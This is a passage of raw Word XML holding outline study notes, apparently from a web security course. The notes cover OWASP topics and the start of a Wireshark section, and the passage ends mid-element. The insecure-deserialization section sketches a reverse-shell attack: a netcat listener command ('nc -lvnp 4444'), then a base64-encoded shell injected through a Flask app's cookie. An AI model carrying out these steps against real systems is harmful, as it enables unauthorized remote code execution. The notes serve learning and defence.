    <w:p w14:paraId="7EB41CA7" w14:textId="49325706" w:rsidR="000E14E7" w:rsidRPr="0084205E" w:rsidRDefault="000E14E7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Insecure Deserialization – Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B415F97" w14:textId="1370FD67" w:rsidR="008A241B" w:rsidRPr="0084205E" w:rsidRDefault="008A241B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Vulnerability via comment input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B60AFE" w14:textId="64DBBBC7" w:rsidR="008A241B" w:rsidRPr="0084205E" w:rsidRDefault="008A241B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Input would be encoded and sent to Flask application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBFB68E" w14:textId="4B419229" w:rsidR="008A241B" w:rsidRPr="0084205E" w:rsidRDefault="008A241B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Application assumes encoded data is trustworthy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D90FD59" w14:textId="08AC8E99" w:rsidR="008A241B" w:rsidRPr="0084205E" w:rsidRDefault="008A241B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Start with creating netcat listening post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE73ACD" w14:textId="78DEF23C" w:rsidR="008A241B" w:rsidRPr="0084205E" w:rsidRDefault="008A241B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 4444”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFFDDF6" w14:textId="5CB7624F" w:rsidR="008A241B" w:rsidRPr="0084205E" w:rsidRDefault="008A241B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Due to cookie encoding in base64, reverse shell </w:t>
      </w:r>
      <w:r w:rsidR="00D736AB" w:rsidRPr="0084205E">
        <w:t>cannot be a straightforward spawn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02435136" w14:textId="0BC94B94" w:rsidR="00D736AB" w:rsidRPr="0084205E" w:rsidRDefault="00D736AB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Commands must be encoded in base64 (or same encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44651826" w14:textId="28A5A64D" w:rsidR="00D736AB" w:rsidRPr="0084205E" w:rsidRDefault="00D736AB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Source code on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75E99AE1" w14:textId="14C4C6B7" w:rsidR="00D736AB" w:rsidRPr="0084205E" w:rsidRDefault="00D736AB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Replace IP with attacker IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C080AF5" w14:textId="17246A30" w:rsidR="00D736AB" w:rsidRPr="0084205E" w:rsidRDefault="003E2883" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Create python exe and run for encoded text string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0A7C57" w14:textId="0E57A327" w:rsidR="003E2883" w:rsidRPr="0084205E" w:rsidRDefault="003E2883" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Paste base64 encoded shell into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>encodedPayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> cookie value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531ACBB6" w14:textId="7B8E1AAA" w:rsidR="003E2883" w:rsidRPr="0084205E" w:rsidRDefault="003E2883" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Refresh page and confirm connection with listening post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A1DE67" w14:textId="37DC8A5D" w:rsidR="003E2883" w:rsidRPr="0084205E" w:rsidRDefault="003E2883" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>, grep commands to search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B4D692" w14:textId="135E3C76" w:rsidR="003E2883" w:rsidRPr="0084205E" w:rsidRDefault="003E2883" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Components with Known Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214241C0" w14:textId="57B69BDD" w:rsidR="003E2883" w:rsidRPr="0084205E" w:rsidRDefault="006953BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Service and version discovery + OSINT = discovery of usage of components with known vulns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138650F1" w14:textId="508656CF" w:rsidR="006953BA" w:rsidRPr="0084205E" w:rsidRDefault="006953BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploit-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to try and find an exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBD1B2A" w14:textId="7076C074" w:rsidR="006953BA" w:rsidRPr="0084205E" w:rsidRDefault="006953BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>When using an exploit script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C20ECA" w14:textId="7AB9CA85" w:rsidR="006953BA" w:rsidRPr="0084205E" w:rsidRDefault="006953BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Input arguments should be contained in quotes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449B43B5" w14:textId="746A337B" w:rsidR="006953BA" w:rsidRPr="0084205E" w:rsidRDefault="00C27E35" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Unauthenticated remote code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2945F3B7" w14:textId="30D8EF45" w:rsidR="00C27E35" w:rsidRPr="0084205E" w:rsidRDefault="00C27E35" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Insufficient Logging and Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5FFD2A" w14:textId="240F376D" w:rsidR="00C27E35" w:rsidRPr="0084205E" w:rsidRDefault="007E09BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Regulatory damage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CE0DD0" w14:textId="4E14F68E" w:rsidR="007E09BE" w:rsidRPr="0084205E" w:rsidRDefault="007E09BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Risk of further attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15437370" w14:textId="060039E0" w:rsidR="007E09BE" w:rsidRPr="0084205E" w:rsidRDefault="007E09BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Information Stored should include</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B90744" w14:textId="24A23D0E" w:rsidR="007E09BE" w:rsidRPr="0084205E" w:rsidRDefault="007E09BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>HTTP status codes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0CF8B5" w14:textId="012E5F2E" w:rsidR="007E09BE" w:rsidRPr="0084205E" w:rsidRDefault="007E09BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Time Stamps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B061650" w14:textId="4EA88ACA" w:rsidR="007E09BE" w:rsidRPr="0084205E" w:rsidRDefault="007E09BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E1395B" w14:textId="4287DF79" w:rsidR="007E09BE" w:rsidRPr="0084205E" w:rsidRDefault="007E09BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>API endpoints/page locations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71950AA2" w14:textId="4CAC1620" w:rsidR="007E09BE" w:rsidRPr="0084205E" w:rsidRDefault="007E09BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D9A39E" w14:textId="6B2A31F2" w:rsidR="007E09BE" w:rsidRPr="0084205E" w:rsidRDefault="007E09BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Important to store multiple accurate copies securely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCAF6AB" w14:textId="58D1AB82" w:rsidR="007E09BE" w:rsidRPr="0084205E" w:rsidRDefault="007E09BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Detecting Suspicious Activity such as </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAD8DC3" w14:textId="227CA996" w:rsidR="007E09BE" w:rsidRPr="0084205E" w:rsidRDefault="007E09BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Multiple unauthorized attempts for a particular action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2382AD1F" w14:textId="56292DE2" w:rsidR="007E09BE" w:rsidRPr="0084205E" w:rsidRDefault="007E09BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Requests from anomalous IP addresses or locations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D212AB" w14:textId="1323A6B2" w:rsidR="007E09BE" w:rsidRPr="0084205E" w:rsidRDefault="007E09BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use of automated tools – using the value of User-Agent headers or speed of requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BEBE9F" w14:textId="4892D001" w:rsidR="007E09BE" w:rsidRPr="0084205E" w:rsidRDefault="007E09BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Common payloads – XSS payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434296DF" w14:textId="55ED268A" w:rsidR="007E09BE" w:rsidRPr="0084205E" w:rsidRDefault="007E09BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Detection must also be rated in severity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EC5680" w14:textId="40DBDBD3" w:rsidR="007E09BE" w:rsidRPr="0084205E" w:rsidRDefault="007E09BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Creates priorities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B879F4C" w14:textId="5F8ADC68" w:rsidR="0056390C" w:rsidRPr="0084205E" w:rsidRDefault="007E09BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Review of logs help detect patterns, tactics, strategies employed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC6A1EF" w14:textId="77777777" w:rsidR="0056390C" w:rsidRPr="0084205E" w:rsidRDefault="0056390C" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AECA2B7" w14:textId="63D1526E" w:rsidR="007E09BE" w:rsidRPr="0084205E" w:rsidRDefault="00A0414C" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70543FA4" w14:textId="20D5F15E" w:rsidR="00A0414C" w:rsidRPr="0084205E" w:rsidRDefault="00A0414C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Created for analyzing packet captures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9962E9" w14:textId="1FA96D07" w:rsidR="00A0414C" w:rsidRPr="0084205E" w:rsidRDefault="00A0414C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Live capture or pre-loaded PCAPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C8635C" w14:textId="3CEF13A9" w:rsidR="000D1BAE" w:rsidRPr="0084205E" w:rsidRDefault="000D1BAE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Green ribbon – manage capture filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD1FF1B" w14:textId="395891C9" w:rsidR="000D1BAE" w:rsidRPr="0084205E" w:rsidRDefault="000D1BAE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>When performing analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DD9A06" w14:textId="2236B50F" w:rsidR="000D1BAE" w:rsidRPr="0084205E" w:rsidRDefault="000D1BAE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Packet number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CCC6CF" w14:textId="31D55C6F" w:rsidR="000D1BAE" w:rsidRPr="0084205E" w:rsidRDefault="000D1BAE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DBA184" w14:textId="0C8A03AC" w:rsidR="000D1BAE" w:rsidRPr="0084205E" w:rsidRDefault="000D1BAE" w:rsidP="0084205E">
      <w:pPr>
